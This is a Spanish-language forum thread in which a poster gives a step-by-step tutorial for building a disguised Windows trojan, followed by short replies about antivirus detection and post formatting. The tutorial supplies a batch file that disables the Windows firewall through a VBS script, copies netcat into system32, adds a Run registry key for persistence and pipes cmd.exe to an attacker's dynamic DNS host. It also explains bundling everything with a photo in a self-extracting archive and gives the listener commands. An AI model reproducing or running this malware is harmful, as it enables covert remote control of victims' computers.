Te explico un poco:
Reverse shell
Es cuando la victima se conecta a vos y te da una shell. El no-ip lo que hace redirigir tu ip dinamica a una direccion dns (yo lo tengo cada 3 segundos) esto hace que por mas que tu ip cambie, siempre se va asociar a tu dns (ej loquesea.no-ip.org) ya explicado esto que hacemos con el netcat hacemos un bat con el nombre vamos.bat
Y le ponemos estos comandos:
nc.exe hay que copiarselo a la victima en
copy C:\Extracted\nc.exe C:\WINDOWS\system32\nc.exeademas a este bat ponerlo en el registro run, para que?
para que cada vez que se prenda la maquina me lo ejecute
start C:\Extracted\data.exeAdemas hice un vbs para desabilitar el friweall de windows, que es el siguiente codigo:
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = false Esto lo guardamos como desa.vbs tambien en el bat lo hacemos ejecutar
start C:\Extracted\desa.vbslo unico que falta poner el comando para conectarnos
nc loquesea.no-ip.org 80 | cmd.exe | nc loquesea.no-ip.org 443bueno el bat quedaria asi:
@echo off
start C:\Extracted\desa.vbs
copy C:\Extracted\nc.exe C:\WINDOWS\system32\nc.exe
reg add hklm\software\microsoft\windows\currentversion\run /v wind /t reg_sz /d C:\Extracted\vamos.exe /f
nc loquesea.no-ip.org 80 | cmd.exe | nc loquesea.no-ip.org 443y el desa.vbs quedaria asi:
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = false Ahora despues que tenes eso, al bat lo pasamos a exe con Bat To Exe Converter.exe luego unimos todo (nc.exe, desa.vbs, vamos.exe) al unirlo todo ponemos la foto, el vamos.exe y luego lo demas (hay que respetar el orden) yo uso el programa SFX COMPILER
terminando, en tu maquina pones en un bat :
nc -vv -l -p 80en otro bat
nc -vv -l -p 443ejecutas los dos y esperas la coneccion antes desabilita tu firewall.
Si lo queres probar antes, en una red local o en una maquina virtual (virtual box) es de la siguiente forma:
en la computadora victima copiar nc.exe en sytem32, luego hacer un bat con el siguiente codigo:
nc ip de tu maquina local 80 | cmd.exe | nc ip de tu maquina local 443para colocar "|" precional alt + ctrl + 1
Ahora en nuestra maquina desconectar el firewall de windows luego realizar 2 bat y los mismo colocar un comando:
este es 1
nc -vv -l -p 80este es 2
nc -vv -l -p 443OJO: PRIMERO EJECUTA ESTOS 2 BAT PARA QUE QUEDEN ESCUCHANDO, Y LUEGO EL COMANDO EN LA VICTIMA.
ESPERO QUE LO ENTIENDAS
Copiado... ingresado al kernel del coco (cabeza) ;D
July Edite el post para que quede mas vistoso y elegante, en otra tabula bien para que quede mejor el tutorial..
Gracias por aportar..
Saludos :P
buen aporte, lastima que la navaja suiza ya sea detectado por muchos antivirus.
salu2
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Copiado... ingresado al kernel del coco (cabeza) ;D
que decis?
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
July Edite el post para que quede mas vistoso y elegante, en otra tabula bien para que quede mejor el tutorial..
Gracias por aportar..
Saludos :P
gracias por arreglarlo bro
PD: No hagas doble post!! Editalo el mensaje Saludos
Atte:Snifer